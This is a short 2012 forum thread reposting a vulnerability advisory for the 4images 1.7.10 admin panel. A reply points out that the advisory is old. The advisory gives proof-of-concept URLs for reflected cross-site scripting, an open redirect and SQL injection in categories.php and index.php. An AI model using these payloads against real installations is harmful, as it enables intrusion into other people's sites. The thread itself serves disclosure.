Author Topic: new exploit for 4 images version 1.7.10  (Read 4907 times)

0 Members and 1 Guest are viewing this topic.

Offline localhost

  • Pre-Newbie
  • Posts: 7
    • View Profile
new exploit for 4 images version 1.7.10
« on: May 17, 2012, 09:52:46 AM »

new exploit for 4 images version 1.7.10  :( :(
################################################################################################

#  Exploit Title: 4Images Version: 1.7.10 Admin Panel Multiple Vulnerabilities
#  Script Page : http://www.4homepages.de
#  Date: 31-01-2012
#  Author : RandomStorm  - http://www.randomstorm.com
#  Avram Marius Gabriel (d3v1l)
#  Tested on: Windows XP & Mac (IE9 - Firefox 9.0)

################################################################################################
#
# Cross-Site Scripting (XSS)
#
# Vector:  'acc91<script>alert(1)</script>9da1925478
#
# http://4images.com/admin/categories.php?action=addcat&cat_parent_id=1 (XSS)
#
################################################################################################
#
# Open Redirect
#
#
# http://4images.com/admin/index.php?__csrf=931086345abbb83f9a70c87dc4719248&action=login&redirect=http://google.com&loginusername=admin&loginpassword=pass
#
#  <title>4images - Control Panel</title>
#      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
#      <link rel="stylesheet" href="./../admin/cpstyle.css">
#     <meta http-equiv="Refresh" content="0; URL=http://google.com">     
#  <script language="JavaScript">
#
#
################################################################################################
#
# Sql Injection
#
# http://4images.com/admin/categories.php?action=addcat&cat_parent_id=1' (SQL Injection)
#
################################################################################################

Rembrandt

  • Guest
Re: new exploit for 4 images version 1.7.10
« Reply #1 on: May 17, 2012, 10:13:36 AM »

new exploit for 4 images version 1.7.10  :( :(
....#  Date: 31-01-2012
...
new?
http://www.4homepages.de/forum/index.php?topic=30602.0

Offline localhost

  • Pre-Newbie
  • Posts: 7
    • View Profile
Re: new exploit for 4 images version 1.7.10
« Reply #2 on: May 17, 2012, 12:14:03 PM »